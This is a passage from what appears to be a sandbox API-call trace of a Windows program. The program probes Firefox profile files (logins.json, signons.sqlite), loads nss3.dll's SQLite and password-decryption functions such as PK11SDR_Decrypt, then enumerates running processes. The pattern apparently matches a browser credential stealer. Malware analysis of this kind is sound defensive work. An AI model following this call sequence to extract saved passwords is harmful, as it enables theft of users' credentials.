yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default\\logins.json") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default\\logins.json" [0087.640] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default\\logins.json" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\mozilla\\firefox\\profiles\\zp0p8bce.default\\logins.json")) returned 0xffffffff [0087.640] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default\\signons.sqlite" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\mozilla\\firefox\\profiles\\zp0p8bce.default\\signons.sqlite")) returned 0x2020 [0087.640] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Mozilla", ulOptions=0x0, samDesired=0x20019, phkResult=0x2888bc | out: phkResult=0x2888bc*=0x114) returned 0x0 [0087.640] RegEnumKeyExW (in: hKey=0x114, dwIndex=0x0, lpName=0x288460, lpcchName=0x287a30, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x287a28 | out: lpName="Firefox", lpcchName=0x287a30, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x287a28) returned 0x0 [0087.640] _wcsnicmp (_String1="Firefox", _String2="mozilla", _MaxCount=0x7) returned -7 [0087.640] RegEnumKeyExW (in: hKey=0x114, dwIndex=0x1, lpName=0x288460, lpcchName=0x287a30, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x287a28 | out: lpName="MaintenanceService", lpcchName=0x287a30, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x287a28) returned 0x0 [0087.640] _wcsnicmp (_String1="Mainten", _String2="mozilla", _MaxCount=0x7) returned -14 [0087.640] RegEnumKeyExW (in: hKey=0x114, dwIndex=0x2, lpName=0x288460, lpcchName=0x287a30, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x287a28 | out: lpName="Mozilla Firefox", lpcchName=0x287a30, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x287a28) returned 0x0 [0087.640] _wcsnicmp (_String1="Mozilla", _String2="mozilla", _MaxCount=0x7) returned 0 [0087.640] _snwprintf (in: _Dest=0x287a50, _Count=0x3ff, _Format="%s\\bin" | out: _Dest="Mozilla Firefox\\bin") returned 19 [0087.640] RegOpenKeyExW (in: hKey=0x114, lpSubKey="Mozilla Firefox\\bin", ulOptions=0x0, samDesired=0x20019, phkResult=0x287a20 | out: phkResult=0x287a20*=0x0) returned 0x2 [0087.641] RegEnumKeyExW (in: hKey=0x114, dwIndex=0x3, lpName=0x288460, lpcchName=0x287a30, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x287a28 | out: lpName="Mozilla Firefox 25.0", lpcchName=0x287a30, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x287a28) returned 0x0 [0087.641] _wcsnicmp (_String1="Mozilla", _String2="mozilla", _MaxCount=0x7) returned 0 [0087.641] _snwprintf (in: _Dest=0x287a50, _Count=0x3ff, _Format="%s\\bin" | out: _Dest="Mozilla Firefox 25.0\\bin") returned 24 [0087.641] RegOpenKeyExW (in: hKey=0x114, lpSubKey="Mozilla Firefox 25.0\\bin", ulOptions=0x0, samDesired=0x20019, phkResult=0x287a20 | out: phkResult=0x287a20*=0x118) returned 0x0 [0087.641] RegQueryValueExW (in: hKey=0x118, lpValueName="PathToExe", lpReserved=0x0, lpType=0x287a04, lpData=0x288660, lpcbData=0x287a08*=0x208 | out: lpType=0x287a04*=0x1, lpData="C:\\Program Files\\Mozilla Firefox\\firefox.exe", lpcbData=0x287a08*=0x5a) returned 0x0 [0087.641] RegCloseKey (hKey=0x118) returned 0x0 [0087.641] wcslen (_String="C:\\Program Files\\Mozilla Firefox") returned 0x20 [0087.641] wcslen (_String="nss3.dll") returned 0x8 [0087.641] wcscpy (in: _Dest=0x287828, _Source="C:\\Program Files\\Mozilla Firefox" | out: _Dest="C:\\Program Files\\Mozilla Firefox") returned="C:\\Program Files\\Mozilla Firefox" [0087.641] wcslen (_String="C:\\Program Files\\Mozilla Firefox") returned 0x20 [0087.641] wcscat (in: _Dest=0x287828, _Source="\\" | out: _Dest="C:\\Program Files\\Mozilla Firefox\\") returned="C:\\Program Files\\Mozilla Firefox\\" [0087.641] wcscat (in: _Dest=0x287828, _Source="nss3.dll" | out: _Dest="C:\\Program Files\\Mozilla Firefox\\nss3.dll") returned="C:\\Program Files\\Mozilla Firefox\\nss3.dll" [0087.641] GetFileAttributesW (lpFileName="C:\\Program Files\\Mozilla Firefox\\nss3.dll" (normalized: "c:\\program files\\mozilla firefox\\nss3.dll")) returned 0x20 [0087.641] FindFirstFileW (in: lpFileName="C:\\Program Files\\Mozilla Firefox\\nss3.dll", lpFindFileData=0x287370 | out: lpFindFileData=0x287370) returned 0x594e38 [0087.641] FindClose (in: hFindFile=0x594e38 | out: hFindFile=0x594e38) returned 1 [0087.641] CompareFileTime (lpFileTime1=0x2888b0, lpFileTime2=0x2888a8) returned 1 [0087.641] wcscpy (in: _Dest=0x288250, _Source="C:\\Program Files\\Mozilla Firefox" | out: _Dest="C:\\Program Files\\Mozilla Firefox") returned="C:\\Program Files\\Mozilla Firefox" [0087.641] RegEnumKeyExW (in: hKey=0x114, dwIndex=0x4, lpName=0x288460, lpcchName=0x287a30, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x287a28 | out: lpName="Mozilla Firefox 25.0", lpcchName=0x287a30, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x287a28) returned 0x103 [0087.641] RegCloseKey (hKey=0x114) returned 0x0 [0087.641] wcscpy (in: _Dest=0x288b00, _Source="C:\\Program Files\\Mozilla Firefox" | out: _Dest="C:\\Program Files\\Mozilla Firefox") returned="C:\\Program Files\\Mozilla Firefox" [0087.641] wcscpy (in: _Dest=0x2888d0, _Source="C:\\Program Files\\Mozilla Firefox" | out: _Dest="C:\\Program Files\\Mozilla Firefox") returned="C:\\Program Files\\Mozilla Firefox" [0087.641] wcscat (in: _Dest=0x288b00, _Source="\\sqlite3.dll" | out: _Dest="C:\\Program Files\\Mozilla Firefox\\sqlite3.dll") returned="C:\\Program Files\\Mozilla Firefox\\sqlite3.dll" [0087.641] GetFileAttributesW (lpFileName="C:\\Program Files\\Mozilla Firefox\\sqlite3.dll" (normalized: "c:\\program files\\mozilla firefox\\sqlite3.dll")) returned 0xffffffff [0087.641] wcscpy (in: _Dest=0x288b00, _Source="C:\\Program Files\\Mozilla Firefox" | out: _Dest="C:\\Program Files\\Mozilla Firefox") returned="C:\\Program Files\\Mozilla Firefox" [0087.641] wcscat (in: _Dest=0x288b00, _Source="\\mozsqlite3.dll" | out: _Dest="C:\\Program Files\\Mozilla Firefox\\mozsqlite3.dll") returned="C:\\Program Files\\Mozilla Firefox\\mozsqlite3.dll" [0087.642] GetFileAttributesW (lpFileName="C:\\Program Files\\Mozilla Firefox\\mozsqlite3.dll" (normalized: "c:\\program files\\mozilla firefox\\mozsqlite3.dll")) returned 0xffffffff [0087.642] wcscpy (in: _Dest=0x288b00, _Source="C:\\Program Files\\Mozilla Firefox" | out: _Dest="C:\\Program Files\\Mozilla Firefox") returned="C:\\Program Files\\Mozilla Firefox" [0087.642] wcscat (in: _Dest=0x288b00, _Source="\\nss3.dll" | out: _Dest="C:\\Program Files\\Mozilla Firefox\\nss3.dll") returned="C:\\Program Files\\Mozilla Firefox\\nss3.dll" [0087.642] GetModuleHandleW (lpModuleName="C:\\Program Files\\Mozilla Firefox\\nss3.dll") returned 0x63270000 [0087.642] GetProcAddress (hModule=0x63270000, lpProcName="sqlite3_open") returned 0x633d1ca0 [0087.642] GetProcAddress (hModule=0x63270000, lpProcName="sqlite3_prepare") returned 0x6335ce70 [0087.642] GetProcAddress (hModule=0x63270000, lpProcName="sqlite3_step") returned 0x633c5200 [0087.642] GetProcAddress (hModule=0x63270000, lpProcName="sqlite3_column_text") returned 0x6337d400 [0087.642] GetProcAddress (hModule=0x63270000, lpProcName="sqlite3_column_int") returned 0x6337d3a0 [0087.642] GetProcAddress (hModule=0x63270000, lpProcName="sqlite3_column_int64") returned 0x6337d3d0 [0087.642] GetProcAddress (hModule=0x63270000, lpProcName="sqlite3_finalize") returned 0x633a9f60 [0087.642] GetProcAddress (hModule=0x63270000, lpProcName="sqlite3_close") returned 0x633abde0 [0087.642] GetProcAddress (hModule=0x63270000, lpProcName="sqlite3_exec") returned 0x633aa270 [0087.642] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default\\signons.sqlite", cchWideChar=-1, lpMultiByteStr=0x28a570, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default\\signons.sqlite", lpUsedDefaultChar=0x0) returned 98 [0087.642] sqlite3_open () returned 0x0 [0087.662] sqlite3_prepare () returned 0x0 [0087.670] sqlite3_step () returned 0x65 [0087.671] sqlite3_finalize () returned 0x0 [0087.671] sqlite3_close () returned 0x0 [0087.671] NSS_Shutdown () returned 0x0 [0087.675] SetCurrentDirectoryW (lpPathName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\desktop")) returned 1 [0087.675] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Mozilla", ulOptions=0x0, samDesired=0x20019, phkResult=0x28a9ac | out: phkResult=0x28a9ac*=0xe8) returned 0x0 [0087.675] RegEnumKeyExW (in: hKey=0xe8, dwIndex=0x0, lpName=0x28a550, lpcchName=0x289b20, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x289b18 | out: lpName="Firefox", lpcchName=0x289b20, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x289b18) returned 0x0 [0087.675] _wcsnicmp (_String1="Firefox", _String2="mozilla", _MaxCount=0x7) returned -7 [0087.675] RegEnumKeyExW (in: hKey=0xe8, dwIndex=0x1, lpName=0x28a550, lpcchName=0x289b20, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x289b18 | out: lpName="MaintenanceService", lpcchName=0x289b20, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x289b18) returned 0x0 [0087.675] _wcsnicmp (_String1="Mainten", _String2="mozilla", _MaxCount=0x7) returned -14 [0087.675] RegEnumKeyExW (in: hKey=0xe8, dwIndex=0x2, lpName=0x28a550, lpcchName=0x289b20, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x289b18 | out: lpName="Mozilla Firefox", lpcchName=0x289b20, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x289b18) returned 0x0 [0087.675] _wcsnicmp (_String1="Mozilla", _String2="mozilla", _MaxCount=0x7) returned 0 [0087.676] _snwprintf (in: _Dest=0x289b40, _Count=0x3ff, _Format="%s\\bin" | out: _Dest="Mozilla Firefox\\bin") returned 19 [0087.676] RegOpenKeyExW (in: hKey=0xe8, lpSubKey="Mozilla Firefox\\bin", ulOptions=0x0, samDesired=0x20019, phkResult=0x289b10 | out: phkResult=0x289b10*=0x0) returned 0x2 [0087.676] RegEnumKeyExW (in: hKey=0xe8, dwIndex=0x3, lpName=0x28a550, lpcchName=0x289b20, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x289b18 | out: lpName="Mozilla Firefox 25.0", lpcchName=0x289b20, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x289b18) returned 0x0 [0087.676] _wcsnicmp (_String1="Mozilla", _String2="mozilla", _MaxCount=0x7) returned 0 [0087.676] _snwprintf (in: _Dest=0x289b40, _Count=0x3ff, _Format="%s\\bin" | out: _Dest="Mozilla Firefox 25.0\\bin") returned 24 [0087.676] RegOpenKeyExW (in: hKey=0xe8, lpSubKey="Mozilla Firefox 25.0\\bin", ulOptions=0x0, samDesired=0x20019, phkResult=0x289b10 | out: phkResult=0x289b10*=0x10c) returned 0x0 [0087.676] RegQueryValueExW (in: hKey=0x10c, lpValueName="PathToExe", lpReserved=0x0, lpType=0x289af4, lpData=0x28a750, lpcbData=0x289af8*=0x208 | out: lpType=0x289af4*=0x1, lpData="C:\\Program Files\\Mozilla Firefox\\firefox.exe", lpcbData=0x289af8*=0x5a) returned 0x0 [0087.676] RegCloseKey (hKey=0x10c) returned 0x0 [0087.676] wcslen (_String="C:\\Program Files\\Mozilla Firefox") returned 0x20 [0087.676] wcslen (_String="nss3.dll") returned 0x8 [0087.676] wcscpy (in: _Dest=0x289918, _Source="C:\\Program Files\\Mozilla Firefox" | out: _Dest="C:\\Program Files\\Mozilla Firefox") returned="C:\\Program Files\\Mozilla Firefox" [0087.676] wcslen (_String="C:\\Program Files\\Mozilla Firefox") returned 0x20 [0087.676] wcscat (in: _Dest=0x289918, _Source="\\" | out: _Dest="C:\\Program Files\\Mozilla Firefox\\") returned="C:\\Program Files\\Mozilla Firefox\\" [0087.676] wcscat (in: _Dest=0x289918, _Source="nss3.dll" | out: _Dest="C:\\Program Files\\Mozilla Firefox\\nss3.dll") returned="C:\\Program Files\\Mozilla Firefox\\nss3.dll" [0087.676] GetFileAttributesW (lpFileName="C:\\Program Files\\Mozilla Firefox\\nss3.dll" (normalized: "c:\\program files\\mozilla firefox\\nss3.dll")) returned 0x20 [0087.676] FindFirstFileW (in: lpFileName="C:\\Program Files\\Mozilla Firefox\\nss3.dll", lpFindFileData=0x289460 | out: lpFindFileData=0x289460) returned 0x594e38 [0087.676] FindClose (in: hFindFile=0x594e38 | out: hFindFile=0x594e38) returned 1 [0087.676] CompareFileTime (lpFileTime1=0x28a9a0, lpFileTime2=0x28a998) returned 1 [0087.676] wcscpy (in: _Dest=0x28a340, _Source="C:\\Program Files\\Mozilla Firefox" | out: _Dest="C:\\Program Files\\Mozilla Firefox") returned="C:\\Program Files\\Mozilla Firefox" [0087.676] RegEnumKeyExW (in: hKey=0xe8, dwIndex=0x4, lpName=0x28a550, lpcchName=0x289b20, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x289b18 | out: lpName="Mozilla Firefox 25.0", lpcchName=0x289b20, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x289b18) returned 0x103 [0087.676] RegCloseKey (hKey=0xe8) returned 0x0 [0087.676] wcscpy (in: _Dest=0x28abd4, _Source="C:\\Program Files\\Mozilla Firefox" | out: _Dest="C:\\Program Files\\Mozilla Firefox") returned="C:\\Program Files\\Mozilla Firefox" [0087.676] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28d96c | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop") returned 0x20 [0087.676] SetCurrentDirectoryW (lpPathName="C:\\Program Files\\Mozilla Firefox" (normalized: "c:\\program files\\mozilla firefox")) returned 1 [0087.677] wcslen (_String="nss3.dll") returned 0x8 [0087.677] wcslen (_String="C:\\Program Files\\Mozilla Firefox") returned 0x20 [0087.677] wcscpy (in: _Dest=0x28a9c4, _Source="C:\\Program Files\\Mozilla Firefox" | out: _Dest="C:\\Program Files\\Mozilla Firefox") returned="C:\\Program Files\\Mozilla Firefox" [0087.677] wcslen (_String="C:\\Program Files\\Mozilla Firefox") returned 0x20 [0087.677] wcscat (in: _Dest=0x28a9c4, _Source="\\" | out: _Dest="C:\\Program Files\\Mozilla Firefox\\") returned="C:\\Program Files\\Mozilla Firefox\\" [0087.677] wcscat (in: _Dest=0x28a9c4, _Source="nss3.dll" | out: _Dest="C:\\Program Files\\Mozilla Firefox\\nss3.dll") returned="C:\\Program Files\\Mozilla Firefox\\nss3.dll" [0087.677] GetModuleHandleW (lpModuleName="C:\\Program Files\\Mozilla Firefox\\nss3.dll") returned 0x63270000 [0087.677] GetProcAddress (hModule=0x63270000, lpProcName="NSS_Init") returned 0x6332d70b [0087.677] GetProcAddress (hModule=0x63270000, lpProcName="NSS_Shutdown") returned 0x6332d13c [0087.677] GetProcAddress (hModule=0x63270000, lpProcName="PK11_GetInternalKeySlot") returned 0x632c3c51 [0087.677] GetProcAddress (hModule=0x63270000, lpProcName="PK11_FreeSlot") returned 0x632c3333 [0087.677] GetProcAddress (hModule=0x63270000, lpProcName="PK11_CheckUserPassword") returned 0x632acbc4 [0087.677] GetProcAddress (hModule=0x63270000, lpProcName="PK11_Authenticate") returned 0x632ad3ca [0087.677] GetProcAddress (hModule=0x63270000, lpProcName="PK11SDR_Decrypt") returned 0x632c00a7 [0087.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default", cchWideChar=-1, lpMultiByteStr=0x28b850, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default", lpUsedDefaultChar=0x0) returned 81 [0087.677] NSS_Init () returned 0xffffffff [0087.696] SetCurrentDirectoryW (lpPathName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\desktop")) returned 1 [0087.696] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0087.698] Process32FirstW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0087.698] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0087.699] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0087.699] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0087.699] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0087.699] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0087.700] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x14c) returned 0x0 [0087.700] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0087.701] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0087.701] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0087.701] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0087.701] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0087.702] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0087.702] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0087.703] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0087.703] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0087.703] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0087.703] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0087.704] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1ec) returned 0x0 [0087.704] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0087.705] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x258) returned 0x0 [0087.705] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0087.705] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0087.705] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0087.706] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0087.706] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0087.707] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x328) returned 0x0 [0087.707] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x354, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2a, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0087.707] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x354) returned 0x0 [0087.707] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0087.708] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x390) returned 0x0 [0087.708] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0087.708] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3e0) returned 0x0 [0087.709] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x430, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0087.709] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x430) returned 0x0 [0087.709] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x48c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0087.710] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x48c) returned 0x0 [0087.710] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0087.710] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0087.710] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0087.711] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x570) returned 0x10c [0087.711] LoadLibraryW (lpLibFileName="psapi.dll") returned 0x773f0000 [0087.713] GetProcAddress (hModule=0x773f0000, lpProcName="GetModuleBaseNameW") returned 0x773f152c [0087.713] GetProcAddress (hModule=0x773f0000, lpProcName="EnumProcessModules") returned 0x773f1408 [0087.713] GetProcAddress (hModule=0x773f0000, lpProcName="GetModuleFileNameExW") returned 0x773f13f0 [0087.713] GetProcAddress (hModule=0x773f0000, lpProcName="EnumProcesses") returned 0x773f1544 [0087.713] GetProcAddress (hModule=0x773f0000, lpProcName="GetModuleInformation") returned 0x773f1420 [0087.713] GetModuleFileNameExW (in: hProcess=0x10c, hModule=0x0, lpFilename=0x28b2f4, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\taskhost.exe" (normalized: "c:\\windows\\system32\\taskhost.exe")) returned 0x20 [0087.713] wcscpy (in: _Dest=0x28b730, _Source="C:\\Windows\\system32\\taskhost.exe" | out: _Dest="C:\\Windows\\system32\\taskhost.exe") returned="C:\\Windows\\system32\\taskhost.exe" [0087.713] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76590000 [0087.713] GetProcAddress (hModule=0x76590000, lpProcName="GetProcessTimes") returned 0x765cf626 [0087.713] GetProcessTimes (in: hProcess=0x10c, lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958 | out: lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958) returned 1 [0087.713] CloseHandle (hObject=0x10c) returned 1 [0087.713] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0087.714] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x598) returned 0x0 [0087.714] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x60c, 